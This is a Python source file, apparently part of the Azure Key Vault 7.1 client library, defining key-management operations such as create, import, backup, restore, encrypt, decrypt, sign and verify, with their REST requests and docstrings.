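        "example-key",
        key_version,
        _models.KeyOperationsParameters(algorithm="RSA-OAEP", value=b"secret"),
    )
    decrypted = client.decrypt(
        vault_url,
        "example-key",
        key_version,
        _models.KeyOperationsParameters(algorithm="RSA-OAEP", value=encrypted.result),
    )
    assert decrypted.result == b"secret"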
class KeyVaultClientOperationsMixin(object):
@distributed_trace
def create_key(
self,
vault_base_url, # type: str
key_name, # type: str
parameters, # type: "_models.KeyCreateParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyBundle"
"""Creates a new key, stores it, then returns key parameters and attributes to the client.
The create key operation can be used to create any key type in Azure Key Vault. If the named
key already exists, Azure Key Vault creates a new version of the key. It requires the
keys/create permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name for the new key. The system will generate the version name for the
new key.
:type key_name: str
:param parameters: The parameters to create a key.
:type parameters: ~azure.keyvault.v7_1.models.KeyCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyCreateParameters')
request = build_create_key_request(
key_name=key_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.create_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_key.metadata = {'url': '/keys/{key-name}/create'} # type: ignore
@distributed_trace
def import_key(
self,
vault_base_url, # type: str
key_name, # type: str
parameters, # type: "_models.KeyImportParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyBundle"
"""Imports an externally created key, stores it, and returns key parameters and attributes to the
client.
The import key operation may be used to import any key type into an Azure Key Vault. If the
named key already exists, Azure Key Vault creates a new version of the key. This operation
requires the keys/import permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: Name for the imported key.
:type key_name: str
:param parameters: The parameters to import a key.
:type parameters: ~azure.keyvault.v7_1.models.KeyImportParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyImportParameters')
request = build_import_key_request(
key_name=key_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.import_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
import_key.metadata = {'url': '/keys/{key-name}'} # type: ignore
@distributed_trace
def delete_key(
self,
vault_base_url, # type: str
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.DeletedKeyBundle"
"""Deletes a key of any type from storage in Azure Key Vault.
The delete key operation cannot be used to remove individual versions of a key. This operation
removes the cryptographic material associated with the key, which means the key is not usable
for Sign/Verify, Wrap/Unwrap or Encrypt/Decrypt operations. This operation requires the
keys/delete permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key to delete.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedKeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.DeletedKeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedKeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
request = build_delete_key_request(
key_name=key_name,
api_version=api_version,
template_url=self.delete_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedKeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_key.metadata = {'url': '/keys/{key-name}'} # type: ignore
@distributed_trace
def update_key(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeyUpdateParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyBundle"
"""The update key operation changes specified attributes of a stored key and can be applied to any
key type and key version stored in Azure Key Vault.
In order to perform this operation, the key must already exist in the Key Vault. Note: The
cryptographic material of a key itself cannot be changed. This operation requires the
keys/update permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of key to update.
:type key_name: str
:param key_version: The version of the key to update.
:type key_version: str
:param parameters: The parameters of the key to update.
:type parameters: ~azure.keyvault.v7_1.models.KeyUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyUpdateParameters')
request = build_update_key_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.update_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_key.metadata = {'url': '/keys/{key-name}/{key-version}'} # type: ignore
@distributed_trace
def get_key(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.KeyBundle"
"""Gets the public part of a stored key.
The get key operation is applicable to all key types. If the requested key is symmetric, then
no key material is released in the response. This operation requires the keys/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key to get.
:type key_name: str
:param key_version: Adding the version parameter retrieves a specific version of a key. This
URI fragment is optional. If not specified, the latest version of the key is returned.
:type key_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
request = build_get_key_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
template_url=self.get_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_key.metadata = {'url': '/keys/{key-name}/{key-version}'} # type: ignore
@distributed_trace
def get_key_versions(
self,
vault_base_url, # type: str
key_name, # type: str
maxresults=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.KeyListResult"]
"""Retrieves a list of individual key versions with the same key name.
The full key identifier, attributes, and tags are provided in the response. This operation
requires the keys/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.keyvault.v7_1.models.KeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "7.1") # type: str
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_get_key_versions_request(
key_name=key_name,
api_version=api_version,
maxresults=maxresults,
template_url=self.get_key_versions.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
else:
request = build_get_key_versions_request(
key_name=key_name,
api_version=api_version,
maxresults=maxresults,
template_url=next_link,
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("KeyListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
get_key_versions.metadata = {'url': '/keys/{key-name}/versions'} # type: ignore
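    # Usage note (sketch): the ItemPaged returned above is lazy. Nothing is sent
    # until iteration starts, and each page issues one GET against
    # /keys/{key-name}/versions, following nextLink until it is exhausted, e.g.
    # ``for item in client.get_key_versions(vault_url, "example-key"): ...``.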
@distributed_trace
def get_keys(
self,
vault_base_url, # type: str
maxresults=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.KeyListResult"]
"""List keys in the specified vault.
Retrieves a list of the keys in the Key Vault as JSON Web Key structures that contain the
        public part of a stored key. The LIST operation is applicable to all key types; however, only
the base key identifier, attributes, and tags are provided in the response. Individual versions
of a key are not listed in the response. This operation requires the keys/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.keyvault.v7_1.models.KeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "7.1") # type: str
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_get_keys_request(
api_version=api_version,
maxresults=maxresults,
template_url=self.get_keys.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
else:
request = build_get_keys_request(
api_version=api_version,
maxresults=maxresults,
template_url=next_link,
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("KeyListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
get_keys.metadata = {'url': '/keys'} # type: ignore
@distributed_trace
def backup_key(
self,
vault_base_url, # type: str
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.BackupKeyResult"
"""Requests that a backup of the specified key be downloaded to the client.
The Key Backup operation exports a key from Azure Key Vault in a protected form. Note that this
operation does NOT return key material in a form that can be used outside the Azure Key Vault
        system; the returned key material is either protected to an Azure Key Vault HSM or to Azure Key
Vault itself. The intent of this operation is to allow a client to GENERATE a key in one Azure
Key Vault instance, BACKUP the key, and then RESTORE it into another Azure Key Vault instance.
The BACKUP operation may be used to export, in protected form, any key type from Azure Key
Vault. Individual versions of a key cannot be backed up. BACKUP / RESTORE can be performed
        within geographical boundaries only, meaning that a BACKUP from one geographical area cannot be
restored to another geographical area. For example, a backup from the US geographical area
        cannot be restored in an EU geographical area. This operation requires the keys/backup
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BackupKeyResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.BackupKeyResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BackupKeyResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
request = build_backup_key_request(
key_name=key_name,
api_version=api_version,
template_url=self.backup_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('BackupKeyResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
backup_key.metadata = {'url': '/keys/{key-name}/backup'} # type: ignore
@distributed_trace
def restore_key(
self,
vault_base_url, # type: str
parameters, # type: "_models.KeyRestoreParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyBundle"
"""Restores a backed up key to a vault.
Imports a previously backed up key into Azure Key Vault, restoring the key, its key identifier,
attributes and access control policies. The RESTORE operation may be used to import a
previously backed up key. Individual versions of a key cannot be restored. The key is restored
in its entirety with the same key name as it had when it was backed up. If the key name is not
available in the target Key Vault, the RESTORE operation will be rejected. While the key name
is retained during restore, the final key identifier will change if the key is restored to a
different vault. Restore will restore all versions and preserve version identifiers. The
RESTORE operation is subject to security constraints: The target Key Vault must be owned by the
        same Microsoft Azure Subscription as the source Key Vault. The user must have RESTORE permission
in the target Key Vault. This operation requires the keys/restore permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param parameters: The parameters to restore the key.
:type parameters: ~azure.keyvault.v7_1.models.KeyRestoreParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyRestoreParameters')
request = build_restore_key_request(
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.restore_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
restore_key.metadata = {'url': '/keys/restore'} # type: ignore
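    # Usage note (sketch): backup_key and restore_key form a pair. The opaque blob
    # in BackupKeyResult.value is what the restore body expects, for example
    # ``client.restore_key(other_vault_url, _models.KeyRestoreParameters(
    # key_bundle_backup=client.backup_key(vault_url, "example-key").value))``.
    # The ``key_bundle_backup`` field name is assumed from the 7.1 models, and
    # restore only succeeds within the same geography, per the docstrings above.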
@distributed_trace
def encrypt(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeyOperationsParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyOperationResult"
"""Encrypts an arbitrary sequence of bytes using an encryption key that is stored in a key vault.
The ENCRYPT operation encrypts an arbitrary sequence of bytes using an encryption key that is
stored in Azure Key Vault. Note that the ENCRYPT operation only supports a single block of
data, the size of which is dependent on the target key and the encryption algorithm to be used.
The ENCRYPT operation is only strictly necessary for symmetric keys stored in Azure Key Vault
        since protection with an asymmetric key can be performed using the public portion of the key. This
operation is supported for asymmetric keys as a convenience for callers that have a
key-reference but do not have access to the public key material. This operation requires the
keys/encrypt permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the encryption operation.
:type parameters: ~azure.keyvault.v7_1.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyOperationsParameters')
request = build_encrypt_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.encrypt.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
encrypt.metadata = {'url': '/keys/{key-name}/{key-version}/encrypt'} # type: ignore
@distributed_trace
def decrypt(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeyOperationsParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyOperationResult"
"""Decrypts a single block of encrypted data.
The DECRYPT operation decrypts a well-formed block of ciphertext using the target encryption
key and specified algorithm. This operation is the reverse of the ENCRYPT operation; only a
        single block of data may be decrypted; the size of this block is dependent on the target key
and the algorithm to be used. The DECRYPT operation applies to asymmetric and symmetric keys
stored in Azure Key Vault since it uses the private portion of the key. This operation requires
the keys/decrypt permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the decryption operation.
:type parameters: ~azure.keyvault.v7_1.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyOperationsParameters')
request = build_decrypt_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.decrypt.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
decrypt.metadata = {'url': '/keys/{key-name}/{key-version}/decrypt'} # type: ignore
@distributed_trace
def sign(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeySignParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyOperationResult"
"""Creates a signature from a digest using the specified key.
The SIGN operation is applicable to asymmetric and symmetric keys stored in Azure Key Vault
since this operation uses the private portion of the key. This operation requires the keys/sign
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the signing operation.
:type parameters: ~azure.keyvault.v7_1.models.KeySignParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeySignParameters')
request = build_sign_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.sign.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
sign.metadata = {'url': '/keys/{key-name}/{key-version}/sign'} # type: ignore
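    # Usage note (sketch): sign and verify form a pair. sign takes a precomputed
    # digest (not the raw message) and returns the signature in
    # KeyOperationResult.result; verify consumes the same digest plus that
    # signature via KeyVerifyParameters and reports a boolean KeyVerifyResult.value.
    # The field names here follow the 7.1 models and are assumptions of this note.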
@distributed_trace
def verify(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeyVerifyParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyVerifyResult"
"""Verifies a signature using a specified key.
The VERIFY operation is applicable to symmetric keys stored in Azure Key Vault. VERIFY is not
strictly necessary for asymmetric keys stored in Azure Key Vault since signature verification
        can be performed using the public portion of the key, but this operation is supported as a
convenience for callers that only have a key-reference and not the public portion of the key.
This operation requires the keys/verify permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for verify operations.
:type parameters: ~azure.keyvault.v7_1.models.KeyVerifyParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyVerifyResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyVerifyResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyVerifyResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyVerifyParameters')
request = build_verify_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.verify.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyVerifyResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
verify.metadata = {'url': '/keys/{key-name}/{key-version}/verify'} # type: ignore
@distributed_trace
def wrap_key(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeyOperationsParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyOperationResult"
"""Wraps a symmetric key using a specified key.
The WRAP operation supports encryption of a symmetric key using a key encryption key that has
previously been stored in an Azure Key Vault. The WRAP operation is only strictly necessary for
symmetric keys stored in Azure Key Vault since protection with an asymmetric key can be
performed using the public portion of the key. This operation is supported for asymmetric keys
as a convenience for callers that have a key-reference but do not have access to the public key
material. This operation requires the keys/wrapKey permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
